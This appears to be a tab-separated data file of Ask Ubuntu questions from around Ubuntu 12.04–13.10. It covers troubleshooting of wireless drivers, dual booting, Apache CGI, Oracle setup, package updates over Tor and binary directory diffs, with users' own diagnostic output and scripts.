381326	changing chmod 755 to 775 on a directory will result in permission denied when connecting with sftp	when i change chmod in my /home/frans from 755 to 775 i get the following error when connecting with ftp fatal : bad ownership or modes for chroot directory `` /home/frans '' i 'm a linux newbie and i 'm not sure on how i can fix this , could someone explain this to me please ?
381328	intel advanced-n 6235 saucy not finding any wireless networks / bluetooth devices	i searched the internet for my problem but did not find exactly the problem iâm facing . i have an intel nuc with ubuntu 13.10 installed . now i added a new pcie intel advanced-n 6235 wifi/bluetooth combo adapter . everything seemed to be detected fine , only it wonât find any wireless networks , nor any bluetooth devices . i already tried to uninstall the gnome-bluetooth application in favour of the bluez stack and the other way round , as i read that both packages could conflict , but no success . i also tried to disable 11n following this post , with no luck . another solution i found was to download and install the latest drivers manually , but i did n't do that yet since i thought the correct drivers should be part of the latest kernel already . kernel version : aethy @ nuke : ~ $ uname -r 3.11.0-13-generic ( ubuntu linux 13.10 , upgraded from 13.04 with xubuntu packages installed for my wife ) aethy @ nuke : ~ $ lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579v gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation qs77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 02:00.0 network controller : intel corporation centrino advanced-n 6235 ( rev 24 ) from lcpci -nn : 02:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6235 [ 8086:088e ] ( rev 24 ) subsystem : intel corporation centrino advanced-n 6235 agn [ 8086:4060 ] kernel driver in use : iwlwifi aethy @ nuke : ~ $ dmesg | grep wifi [ 3.058595 ] iwlwifi 0000:02:00.0 : ca n't disable aspm ; os does n't have aspm control [ 3.058671 ] iwlwifi 0000:02:00.0 : irq 45 for msi/msi-x [ 3.083353 ] iwlwifi 0000:02:00.0 : loaded firmware version 18.168.6.1 op_mode iwldvm [ 3.148594 ] iwlwifi 0000:02:00.0 : config_iwlwifi_debug disabled [ 3.148599 ] iwlwifi 0000:02:00.0 : config_iwlwifi_debugfs enabled [ 3.148603 ] iwlwifi 0000:02:00.0 : config_iwlwifi_device_tracing enabled [ 3.148606 ] iwlwifi 0000:02:00.0 : config_iwlwifi_p2p disabled [ 3.148611 ] iwlwifi 0000:02:00.0 : detected intel ( r ) centrino ( r ) advanced-n 6235 agn , rev=0xb0 [ 3.149582 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 4.349943 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 4.357260 ] iwlwifi 0000:02:00.0 : radio type=0x2-0x1-0x0 [ 4.631726 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 4.638561 ] iwlwifi 0000:02:00.0 : radio type=0x2-0x1-0x0 aethy @ nuke : ~ $ lsmod | grep wifi iwlwifi 143578 1 iwldvm cfg80211 401436 3 iwlwifi , mac80211 , iwldvm aethy @ nuke : ~ $ ifconfig eth0 link encap : ethernet hwaddr ec : a8:6b : f1 : fb:45 inet addr:94.227.41.23 bcast:94.227.41.255 mask:255.255.254.0 inet6 addr : fe80 : :eea8:6bff : fef1 : fb45/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1629223 errors:0 dropped:0 overruns:0 frame:0 tx packets:611522 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2378810676 ( 2.3 gb ) tx bytes:61283015 ( 61.2 mb ) interrupt:20 memory : f7d00000-f7d20000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:25073 errors:0 dropped:0 overruns:0 frame:0 tx packets:25073 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2683709 ( 2.6 mb ) tx bytes:2683709 ( 2.6 mb ) wlan0 link encap : ethernet hwaddr c4 : d9:87:0a : ee : f7 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) aethy @ nuke : ~ $ iwconfig wlan0 ieee 802.11abg essid : off/any mode : managed access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions . aethy @ nuke : ~ $ iwlist scanning wlan0 no scan results lo interface does n't support scanning . eth0 interface does n't support scanning . bluetooth packages installed : aethy @ nuke : ~ $ dpkg -- get-selections | grep blue blueman install bluemon install bluetooth install bluez install bluez-alsa : i386 install bluez-cups install bluez-gstreamer install bluez-hcidump install bluez-tools install gir1.2-gnomebluetooth-1.0 install gnome-bluetooth install indicator-bluetooth install libbluetooth3 : i386 install libgnome-bluetooth11 install pulseaudio-module-bluetooth install python-bluez install no bluetooth devices found ( while my gsm was visible and my stereo was pairing ) aethy @ nuke : ~ $ hcitool scan scanning ... aethy @ nuke : ~ $
381329	how to know what firmware a new nexus 4 has ?	i would like to buy a new nexus 4 to flash the ubuntu phone on it . it 's written what firmware ( nexus 4 mako occam ) the phone should have , but how to find out if i buy it from the store ?
381335	difference in top command and gnome-system-terminal applet	i am running xubuntu 12.04 , and i find that top command reports 900mb ram usage where as gnome-system-terminal applet graphically shows only 300mb ram usage . why the values are differently reported ? what is now the correct thing ? and why top reports it that way . thanks , harish pathangay
381337	open files with vim in terminal	is there any way to open file with vim in the terminal without typing file name , but for example then i see in the directory my file , go with arrow keys or something like that ? i think i saw one of my old buddy choosing files with keys , but i am not very sure of that .
381338	choose default application , gedit not found	when i try to download off the internet i am asked which application to use - ie there is no default selected - so i just get a file with a dot next to it and can not run the download . what should i do ? ! gedit not found in search :
381339	file type and size 13.1	what type of file should i make the partitions , what size should i make them and do i need a storage partition for a total of 3 . 1-os partition , 2-swap partition , and 3-storage partition ?
381340	how to reset ~/.profile to default	i have been playing around with the ~/.profile file trying to add something permanently to my $ path variable and it seems i have done some damage . i ca n't log into ubuntu now . when i enter my password the screen goes black for 1 second and then it goes back to the login screen . if i press ctrl+alt+f3 i can log in with the command line . my question is how can i edit ~/.profile from the command line so i can log in again ?
381341	uninstall ubuntu from windows dual boot	i 've dual booted windows 7 and ubuntu on my computer and i 'm having trouble uninstalling ubuntu . i do n't remember how i installed it but i 've ruled some things out . most tutorials tell me to delete the disk partition through disk management in windows , but when i check there , there 's only the windows partition . this makes me think that i installed using wubi , but when i go to uninstall ubuntu as a program , its not listed in the programs list . anyone have any ideas how to uninstall ubuntu from windows ?
381347	updating to 12.10 failure	i recently started using ubuntu regularly , as it ran much more efficiently than windows 7 which i 'd been using before . i 'm not the most knowledgeable person when it comes to computers , so i ca n't go into detail about what went wrong , as i do n't fully understand , so let me try to explain step-by-step . i had downloaded and installed ubuntu 12.04 64-bit using the wubi windows installer , and it ran just fine . i got all my files moved/copied over and 'set up shop ' so to speak . after about a week , i tried to upgrade to 12.10 , so i let the update go , making sure everything was closed , and checking yes to pretty much every box that came up . after i hit yes to the `` delete outdated files '' option , or something along those lines , it was almost finished with the process when it asked me if i wanted to restart my system . i did . then after booting up again , my screen just went black . in the top-left corner there was an underscore like i could type something , but it appeared to be frozen . i would greatly appreciate if someone could find out what went wrong , and hopefully tell me how to fix it .
381348	resolved -dual boot windows 8 / ubuntu 12.04 is not working - boot-repair did not help as well	since i heard i could have windows 8 and ubuntu running at the same computer ( using the same hd ) i was really exited to test , but unfortunately i 'm not being luck doing that : ( my computer details : notebook - dell inspiron 15r 8gb ram 1 tb hd sata3 30gb ssd video card - ati radeon hd7700 i was running windows 8.1 without any problem , so here what i did : i create a partition with 100gb ( using windows disk utility ) i enable legacy boot ( disabled uefi and security boot ) and changed the dell smart hd control to ahci started the ubuntu installation using ubuntu 12.04 iso i did the default procedure , advanced options - > create 4 partitions ( / , /home , /boot , swap ) when the installation was done i started the live ubuntu 12.04 and i used boot-repair as the tutorial informed to do . the linux is running perfect but i ca n't log in windows anymore : ( i can see on grub2 some options , but when i try to load windows 8 i get : dell recovery screen ( the options simple does n't help me , it says i need to unlock or get permissions of the installation , but the prompt works fine ) an screen saying about an unknown issue , some hdx ( 100,200 blabla bla ) i tryied boot repair a lot of times and i do n't know how i installed a different boot as well that starts grub since the prompt works fine i tried the mbr fix procedure and also the boot recovery procedure using disk utility i also tried : bootrec fixmbr bootrec /fixboot bootrec /scanos bootrec /rebuildbcd bcdedit /set { default } device partition=c : bcdedit /set { default } osdevice partition=c : bcdedit /set { bootmgr } device partition=c : right now i still can boot windows 8 , i know windows 8 is sucks but i really need it since some applications i use only runs on it : ( any idea in how to fix that ? pastebin i have with me : http : //paste.ubuntu.com/6462192/ http : //paste.ubuntu.com/6465662/ ps . i understand it may be a duplicated case , but i expend the last day trying to figured out how to solve but i could n't , that 's why i 'm creating and ask with my information - sorry bad english edit : after the installation i did change the boot mode to uefi security off ( since i didnt choose the boot-repair to create ssh keys with the security boot ) edit2 : error image : docs.google.com/file/d/0b8mtxjwmeudkavowuvd2cs15nhpabewyynv2nfdmuldkre5n/edit edit3 : imgur.com/whqxcla - > gparted screenshot
381354	gedit 3.8.3 in ubuntu 13.10 editor width issue	not sure if i have a wrong setting or something , but seems like the editor width is larger than its container , and it is ignoring/hidding the overflow . if i make the window wider , like two horizontal desktops panels , then i can see the hidden part . same happens when a file is externally updated , it doesnt show the 'refresh ' button . any ideas ?
381362	missing mouse after gnome install	i recently installed gnome3 on my ubuntu partition ( on a suspicion that unity is memory leaking ) and now my mouse has disappeared from both the login screen and after logged in . i used these instructions to install it on my ubuntu 13.10 this morning so it should be the most recent version i think . does anyone know what causes this or how to fix it ?
381364	how to run oracle 12c on ubuntu 12.04 ?	i just installed oracle database 12c on an ubuntu 12.04 . i followed this tutorial and have n't done much more than that . after the installation i tried to connect sqldeveloper to the database , something i already did with 11g & windows 7 and 11g & ubuntu . anyway so i 'm getting this error : status : failure -test failed : io error : the network adapter could not establish the connection i tried executing the netac command but it did n't work as a command i had to execute the bin , and the output was : oracle @ abdou-pc : /oracle/base/dbhome_1/bin $ ./netca oracle net services configuration : no protocol specified no protocol specified error : null here is the log : http : //pastebin.com/ir4ecg3u i thought this may also be of use : root @ abdou-pc : /home/abdou # oraenv oracle_sid = [ root ] ? oracle_home = [ /home/oracle ] ? oracle_base environment variable is not being set since this information is not available for the current user id root . you can set oracle_base manually if it is required . /usr/local/bin/oraenv : 223 : [ : unexpected operator my oracle is installed in /oracle/base/dbhome_1 i do n't know what other info i should post , and i do n't wan na flood you people , so i 'm here and i can post any info you need on demand . it seems to me that my oracle db is n't even launched , and neither are the listeners , and there might be a problem with my env vars i do n't have much experience with the configuring part of the databases , and i know that oracle is n't supported on ubuntu but i like ubuntu and it 's just for learning purposes . thank you all for your help .
381366	grub from debian to ubuntu	i currently dual-boot windows 7 and debian on my computer , both being on separate hard drives . i want to overwrite debian with ubuntu , but i do n't know what will happen to grub and windows loader as a result . can anyone help me ?
381367	why there is no shell ?	i downloaded the ubuntu operating system ( ubuntu 12.04.3 ) because i learn computer science , and for that i need the shell but on ubuntu there is no shell . do anybody know why is that ? or where i can find the shell window ?
381370	text justification in gtk.menuitem	i 'm writing an appindicator python script for my gnome panel ( under ubuntu 12.10 , english as the system-wide language ) with a gtk.menu , containing menuitem 's with hebrew labels . the text is correctly justified to the right [ hebrew is rtl ] , but the problem is that each menu bar ( the box bounding the labels ) is itself aligned to the left , such that the right indentation becomes different for different items : ( for the sake of clarity , in this example there are two menu items , each with two rows of text ) my test code is as follows : # ! /usr/bin/python # coding=utf-8 import appindicator import gtk a = appindicator.indicator ( 'test_indicator ' , '/some/ico ' , appindicator.category_application_status ) a.set_status ( appindicator.status_active ) m = gtk.menu ( ) item0 = gtk.menuitem ( `` דוגמה : שורה ראשונה\nשורה שניה '' ) item1 = gtk.menuitem ( `` שורה שלישית\nשורה רביעית '' ) m.append ( item0 ) m.append ( item1 ) a.set_menu ( m ) item0.show ( ) item1.show ( ) gtk.main ( ) is there a way to align both the text and the bar to the right without changing the language globally ? i see neither relevant keys in gconf , nor relevant members in menuitem class ( set_right_justified does n't do the job ) . update code update inspired by the suggestion of timo ( note the shift to gtk3 ) : from gi.repository import gtk from gi.repository import appindicator3 as appindicator a = appindicator.indicator.new ( 'test_indicator ' , '/some/ico ' , appindicator.indicatorcategory.application_status ) a.set_status ( appindicator.indicatorstatus.active ) m = gtk.menu ( ) item0 = gtk.menuitem ( `` \tדוגמה : שורה ראשונה\n\tשורה שניה '' ) item1 = gtk.menuitem ( `` \tשורה שלישית\n\tשורה רביעית '' ) item0.set_halign ( gtk.align.end ) item1.set_halign ( gtk.align.end ) # the rest is the same the important adjustment in this version is : addition of leading \t 's for each row - otherwise the text starts out of the menu boundaries . this is more like a workaround , but the current state is nearly satisfactory :
381377	apt-get update through tor	i 'm trying to update my apt-get list . in my country a lot of sites are blocked or have been blocked from companies . when i use a proxy for the whole system i get errors , tor works perfectly when browsing . my question is can i update apt-get through a connection from tor ? i mean i want to unblock the blocked sites using tor connection so i can perform `` apt-get update '' without errors ... thanks in advance . edit btw : i 'm using ubuntu 13.10 and tor 0.2.21 alexander @ alexander-pc : ~ $ sudo apt-get update [ sudo ] password for alexander : ign http : //extras.ubuntu.com saucy inrelease ign http : //security.ubuntu.com saucy-security inrelease ign http : //us.archive.ubuntu.com saucy inrelease hit http : //extras.ubuntu.com saucy release.gpg get:1 http : //dl.google.com stable inrelease [ 1,540 b ] 100 % [ 1 inrelease gpgv 1,540 b ] [ waiting for headers ] [ waiting for headers ] [ wasplitting up/var/lib/apt/lists/partial/dl.google.com_linux_chrome_deb_dists_stabign http : //dl.google.com stable inrelease e : gpg error : http : //dl.google.com stable inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ?
381380	get binary delta-encoded recursive diff of two directories as single patch file in cli ( and online use )	essentially , i am looking for a gnu/linux tool , that could recursively iterate through two directories , find file changes/additions/deletions ; and for all changed files , output a diff . this can already be done by diff efficiently for text files , but not for large binary files - i would like also efficient `` diffs '' between binary files included in the final patch ( which , i gather , is known as binary delta compression - wikipedia as subset of delta encoding - wikipedia ) . or , in other words , do something like described in this `` wishlist '' comment ( from commandlinesyntax - xdelta - google project hosting ) : it would be very nice if xdelta supported multiple files patching . something like : xdelta3 -r /path/folder1 /path/folder2 > allfilesrecursivepatch.xdelta for recursive comparing all files on folder1 and folder2 and creating a single patch-file for all of them . and : xdelta3 -r -d /path/folder1 < allfilesrecursivepatch.xdelta for applying the patch on all files contained on folder1 this facility does not exist , judging by issue 21 - xdelta - recursive directory diff support - google project hosting ) , although there are ways around : the issue page has several suggestions for script wrappers , but i 'd rather keep things self-contained in a single tool . most important for me would be the patching a `` live '' filesystem directory part as shown above , due to my intended use case - described in more detail below , and illustrated with a bash script that uses git . i 'd want to be able to update a static website on a cheapish linux host/webfarm , which only allows ftp transfer ( so no rsync and such ) with a rather low transfer speed , and only allows php script execution . typically i 'd need to sync from local/client/home to server/webhost , but of course i do not want to upload 200 mb each time i want to update a page : ) i could use outlandishideas/sync · github to `` sync directory contents over http using php '' , but besides only syncing from server to local , also only whole files are send : `` no attempt is made to send diffs ; this is not rsync '' . similarly , i could use gnu ftpsync ; it could probably handle file creation , modification and deletion , but it has the same problem - only whole files will be sent . in principle , git could be used too - the below script generates directories testdir_old and testdir_new , and shows that git can encode the differences between them ( in this case being `` removed 1024 ; added 1024 ; modified/added 19 ; modified inline 1200 '' , or total 3267 bytes of change ) as a `` sneakernet '' git bundle file 4470 bytes in size . but even if i could persuade the host to install git up there , i 'd still have to maintain a .git repo up on the webhost for the bundle to apply cleanly - and i definitely do not want to do that , as i could n't spare the extra file size usage ; also , it seems that managing large binary files with git - stack overflow requires git annex or git bup.. and putting around a script like below would be problematic because git would recreate new revision hashes each time , making the bundle not apply cleanly . also , since in php , i can apparently `` untar-gz without exec ( ) ? - stack overflow '' , maybe it 's worth trying to determine changes in directory , then pack only the changed files in a tar.gz , and send that to php script on the server , that would unpack it over the target directory . this would still send entire files , but at least they 'd be compressed - but deletions on server would be difficult to handle . finally , the binary file diff utilities suggest that one could pack the directories in a .tar ( .gz ) each , and then run the utility on those files - e.g . ( via externalcompression - xdelta - google project hosting ) : gzip release-1.tar gzip release-2.tar xdelta3 -e -s release-1.tar.gz release-2.tar.gz delta-1-2.xd3 xdelta3 -d -s release-1.tar.gz delta-1-2.xd3 release-2.tar.gz ... probably also doable with jojodiff / jdiff jdiff archive0000.tar archive0001.tar archive0001.jdf jptch archive0000.tar archive0001.jdf archive0001b.tar ... or with bsdiff . however , that requires me to also maintain a tar archive of the entire site on the webhost , to allow the patches to apply cleanly to it , and the space is issue here again . it would also force me to ask the webhost to allow me the install and use of at least the patching parts of the tools ; and that may be worth a try again , if those tools would n't also require me to keep an additional tar 'd copy of the site on the host . anyways , below is the script that demonstrates extraction of a git .bundle as a recursive diff between two directories ( or rather , two versions of the same directory ) ; relevant terminal output is included in the comments : # ! /usr/bin/env bash # # comments with double # # ; ( relevant ) terminal output with single # # # uses git , imagemagick , tree set -x cd /tmp rm -rf testdir export_compare mkdir testdir cd testdir git init # initialized empty git repository in /tmp/testdir/.git/ git config user.name `` test '' git config user.email `` test @ test.com '' # # generate files - revision 1 # # - text cat /dev/urandom | tr -dc ' [ -~ ] ' | fold -w 80 -s | head -c 1024 > test_01.txt mkdir subdir cat /dev/urandom | tr -dc ' [ -~ ] ' | fold -w 80 -s | head -c 1024 > subdir/subtest_01.txt cat /dev/urandom | tr -dc ' [ -~ ] ' | fold -w 80 -s | head -c 1024 > subdir/subtest_02.txt # # - binary convert -depth 8 -size 200x150 xc : blue rgb : subdir/rgbimage.dat # # check : # # - files : tree -s -- dirsfirst . # . # ├── [ 4096 ] subdir # │ ├── [ 90000 ] rgbimage.dat # │ ├── [ 1024 ] subtest_01.txt # │ └── [ 1024 ] subtest_02.txt # └── [ 1024 ] test_01.txt # # 1 directory , 4 files # # - view image ( press `` q '' to quit ) display -depth 8 -size 200x150 rgb : subdir/rgbimage.dat git add * git commit -m `` initial commit '' # # check usage du -ba -- max-depth=1 . # 1024 ./test_01.txt # 96144 ./subdir # 99947 ./.git # 201211 . # # change files - revision 2 # # remove file : rep= '' removed 1024 ; '' git rm subdir/subtest_02.txt # # add file rep= '' $ rep added 1024 ; '' cat /dev/urandom | tr -dc ' [ -~ ] ' | fold -w 80 -s | head -c 1024 > test_02.txt git add test_02.txt # # change files : # # - text : rep= '' $ rep modified/added 19 ; '' echo `` a new changed line '' > > test_01.txt # # - binary rep= '' $ rep modified inline 1200 '' convert -depth 8 -size 1x200 xc : red rgb : /dev/stdout | dd of=subdir/rgbimage.dat bs=1 seek= $ ( ( 200*50*3 ) ) count= $ ( ( 200*3 ) ) conv=notrunc convert -depth 8 -size 1x200 xc : red rgb : /dev/stdout | dd of=subdir/rgbimage.dat bs=1 seek= $ ( ( 200*100*3 ) ) count= $ ( ( 200*3 ) ) conv=notrunc # # check : # # - files : tree -s -- dirsfirst . # . # ├── [ 4096 ] subdir # │ ├── [ 90000 ] rgbimage.dat # │ └── [ 1024 ] subtest_01.txt # ├── [ 1043 ] test_01.txt # └── [ 1024 ] test_02.txt # # 1 directory , 4 files # # - view image ( press `` q '' to quit ) display -depth 8 -size 200x150 rgb : subdir/rgbimage.dat git add * git commit -m `` second commit with changes '' # [ master 2b243fb ] second commit with changes # 4 files changed , 16 insertions ( + ) , 19 deletions ( - ) ... # # check usage du -ba -- max-depth=1 . # 1043 ./test_01.txt # 1024 ./test_02.txt # 95120 ./subdir # 123355 ./.git # 224638 . # # go back to parent dir ( /tmp ) and make a new directory for `` clean '' exports : cd /tmp mkdir export_compare mkdir export_compare/testdir_new mkdir export_compare/testdir_old # # from git , export each revision `` cleanly '' cd testdir git archive head | tar -x -c /tmp/export_compare/testdir_new git archive head^1 | tar -x -c /tmp/export_compare/testdir_old # # create git bundle , containing the changes between new and old revision git bundle create ../commits_testdir.bundle head head^1 # ... writing objects : 100 % ( 13/13 ) , 4.30 kib , done . # total 13 ( delta 2 ) , reused 0 ( delta 0 ) # # check cd /tmp echo $ rep # removed 1024 ; added 1024 ; modified/added 19 ; modified inline 1200 du -b commits_testdir.bundle # 4470 commits_testdir.bundle cd export_compare du -bs testdir_old testdir_new # 101264 testdir_old # 101283 testdir_new tree -s -- dirsfirst . # . # ├── [ 4096 ] testdir_new # │ ├── [ 4096 ] subdir # │ │ ├── [ 90000 ] rgbimage.dat # │ │ └── [ 1024 ] subtest_01.txt # │ ├── [ 1043 ] test_01.txt # │ └── [ 1024 ] test_02.txt # └── [ 4096 ] testdir_old # ├── [ 4096 ] subdir # │ ├── [ 90000 ] rgbimage.dat # │ ├── [ 1024 ] subtest_01.txt # │ └── [ 1024 ] subtest_02.txt # └── [ 1024 ] test_01.txt # # 4 directories , 8 files # + set +x set +x
381382	kernel.org kernel config options different from ubuntu ones	after compiling ubuntu kernels for a few days ( quite a fun experience , i must say ) , i decided to finally plunge into some vanilla kernel goodness . so far , so good . downloaded the most recent ( 3.13-rc1 ) kernel from kernel.org , untared the source , copied my config file over , made a localmodconfig and went right into menuconfig . strangely enough , many options appear different from their ubuntu brethren . for one , there is no option to add an arbitrary version string . is there any way i can enable all the options the ubuntu config had to over ?
381383	how to restore hidden nautilus window ?	in an apparently failed attempt to type ctrl-alt-t to open a new terminal window , the entire nautilus gui went away and was replaced with a terminal login : logging in/out does n't show the original nautilus window . short of rebooting ( i have open terminals with running processes ) , how can the hidden nautilus window be restored ?
381385	how to re-download unauthenticated packages	i live in egypt . we have a country specific server here . i used to download everything from there . but when i got to download encryptfs , synaptic said the package could not be authenticated , so i changed the ubuntu server and the packages could now be authenticated ... . due to the fact that we live in a country with mass surveillance and no laws to protect privacy or human rights , i have been thinking that maybe backdoors were placed in the unauthenticated package . so i have decided to redownload all the unsigned packages from the main ubuntu server , however this does n't seem to be addressed anywhere ... how to re-install packages..
381388	installing ubuntu 13.10 on acer aspire s5	this laptop is currently running windows 8 , and i would like to dual boot ubuntu on it . this laptop has two ssd 's , but treats them as one . it also does not have an optical drive . i tried installing ubuntu through a usb , but once i boot into it , it does n't recognize any of the partitions . i tried changing the sata mode in bios , but after doing it i could n't get my laptop to boot up at all .
381392	i want to purchase a new ubuntu installation cd	can you mail me a new ubuntu instillation cd , please ? i want to switch from windows and need an installation cd , please . how much do you charge ? can i send you a check , please , i do not trust online banking .
381394	upgrading ubuntu 13.04 to 13.10 stuck during `` installing the upgrades '' -- what to do ?	i am running ubuntu 13.04 and the upgrade manager asked if i wanted to upgrade so i said yes and the upgrade is running now . the upgrade seems to have frozen at `` installing the upgrades '' . if i expand the terminal window it says `` downloading dropbox ... 38 % '' . it has been sitting at 38 % for about an hour . what should i do ? let it sit longer ? reboot ? any other ideas ? thanks !
381399	download the upgrade to hard drive ?	i have ubuntu 8.10 on my laptop . is it possible to download and install the latest upgrade direct to the hd , or just install direct from the web ? all the upgrade info i found seems to assume i 'm replacing windows , which i 'm not .
381401	connecting to public library wireless	so this is odd . when i 'm at home , i can connect and stay connected to the wireless router . when i 'm at work at the library , kubuntu wo n't connect to the public wifi . the only way i can get around this is to connect to the wifi with my phone and then tether the computer through usb . this does n't have any problems . i 'm using a 2007 macbook . kubuntu 13.10 and the broadcam sta wireless driver .
381402	eclipse kepler crashes without any log entry	i 'm using ubuntu 13.10 saucy salamander 64bit and eclipse kepler 64bit terminates after some random time without response . the windows simply disappears . there 's also no entry about the crash in .metadata/.log
381404	installing ubuntu on galaxy s3	i 'm trying to install ubuntu on my galaxy s3 , but i do n't know how to do it . i am looking for the best rom for my phone and i 've seen ubuntu os , but i ca n't get it to work . i do n't have ubuntu install on my computer because it uses windows applications . if ubuntu could run windows apps , then i wound keep ubuntu . how can i install ubuntu on my phone ?
381407	python cgi can not execute in ubuntu 13.10	today i just updated my ubuntu from 12.04 to 13.10 . and then some thing happened really bad . i can not execute python cgi in ubuntu 13.10 apache 2.4 even through i already config everything in apache2 setting . but i still can not execute it ( its show a python cgi source code in browers instead of running ) . before install 13.10 i was using 12.04 and everything worked fine . but now i do n't know why . i 'm writting a website and i have to be finished soon . but now i do n't know how to solve this problem . why this happened ? where did i wrong ? /etc/apache2/apache2.conf : includeoptional mods-enabled/*.load includeoptional mods-enabled/*.conf include ports.conf include conf-available/serve-cgi-bin.conf options +indexes +followsymlinks +execcgi allowoverride none allow from all addhandler cgi-script .py require all granted options +indexes +followsymlinks +execcgi allowoverride none allow from all addhandler cgi-script .py require all granted options +indexes +followsymlinks +execcgi allowoverride none allow from all addhandler cgi-script .py require all granted /etc/apache2/sites-available/000-default.conf : include conf-available/serve-cgi-bin.conf serveradmin webmaster @ localhost documentroot /media/web options +execcgi addhandler cgi-script .py < directory /media/web/ > options +indexes +followsymlinks +execcgi allowoverride none addhandler cgi-script .py allow from all require all granted < /directory > /etc/apache2/conf-enabled/serve-cgi-bin.conf : < ifmodule mod_cgi.c > define enalble_usr_lib_cgi_bin < /ifmodule > < ifmodule mod_cgid.c > define enalble_usr_lib_cgi_bin < /ifmodule > < ifdefine enalble_usr_lib_cgi_bin > scriptalias /cgi-bin/ /media/web/ < directory `` /media/web '' > allowoverride none options +execcgi +multiviews +symlinksifownermatch +followsymlinks allow from all addhandler cgi-script .py < /directory > < /ifdefine > vim : syntax=apache ts=4 sw=4 sts=4 sr noet i can accces localhost normally and work fine .i already restart & reload apache 2 for thousand time but still not working !
381408	booting failed when tried with windows installer	i have downloaded ubuntu 64 bit version iso on my mobile then transfered it to laptop via bluetooth . now when i tried to install it my preparing a usb bootable device with windows installer , it is shows could not retieve the required disk image file and then the installation fails . what should i do .
381409	gnuplot does not work as intended	i have installed gnuplot 4.6.4 after downloading it from sourceforge.net and it does not have the wxt terminal . how can i remedy this issue ? in addition to that the cursor position is not displayed in the x11 window the coordinates at the bottom left are frozen . i think the issue is related to my inexperience in installing software in ubuntu 12.04 . i would appreciate it if you can assist me in the process . thanks in advance .
381411	how do i make raid with 2 disks on ubuntu server ?	i have two 500 gb disks that i have installed on my ubuntu 12 system , one is my main file system , and the other i partioned as a raid disk in the ubuntu installation . i would like to remount the second disk so i can use it with linux raid and view it on webmin . right now it is not even being listed a mounted . i used the command sudo lshw -c disk and the output for the two disks is such : *-disk description : ata disk product : wdc wd5003azex-0 vendor : western digital physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/sda version : 80.0 serial : wd-wmc1s5696862 size : 465gib ( 500gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=000d2dd1 *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 3:0.0.0 logical name : /dev/sdb size : 465gib ( 500gb ) any help is greatly appreciated , i have been battling this for a few months now . if you need more info feel free to ask . this must be done via command line for i am using server edition
381413	which non-free code gets installed by default in 12.04 ?	which non-free components/programs ship with ubuntu 12.04 ? i’m not referring to non-free software available from the repositories , but only to software that gets installed by default . ( i’m not sure if the offer to install third-party software is available in 12.04 , but let’s assume that this option doesn’t get selected ) . `` non-free '' = everything not licensed under a free license ( as defined by the gnu project ) . i read that the linux kernel includes non-free blobs . true ? if so , which parts are non-free ? only some specific hardware drivers ? anything else ?
381415	how to uninstall an application	how can i uninstall an application including systemwide configuration files and user-specific configuration files of that app ?
381419	how to delete list of played movies in movie player	movie player lists names of last few movies played . how to delete that list ? going forward , i 'll use vlc . but i 'd like to clear that viewed movie history list .
381421	sharing a mount point between users	thanks for stopping by . i 'm relatively new to linux and am trying to understand what 's going on . i just installed ubuntu 13.04 on my ssd and it appears it has automounted my mirrored hdd partition at /media/michael/local disk . it seems weird to me that my other user needs to access the disk through the mount that 's located in my folder . is there not some sort of common area ? furthermore , when another user logs in and tries to select the local disk in the file browser under devices , it says something like `` you do n't have permission to view this . '' i 'm guessing that since the drive was mounted on my account the permissions are granted to me and me alone . i guess i could change the group or folder permissions to grant access but ... seems like a hack . is this really the correct way ? thanks for any help in advance . just switched over to linux from windows and am trying to get properly set up .
381422	recapture hard drive space	ihave tried several versions of linux on my vista windows dell inspirion e1705 laptop . each time i have installed a linux os from the magazine dvd i have used a portion of my c drive to do so . how do i reallocate these drive partitions back to the windows portion of the drive or use them for other linux trials ?
381423	how to kill all processes in one virtual console from another virtual console ?	when i press ctrl + alt + f ( 1-6 ) , i 'm directed to virtual terminal . i 've two user account except guest . when i try to login from one of those two users , my system gets hang . so , i was wondering how to restart that virtual console from another virtual console or how to kill all processes in one virtual console from another virtual console .
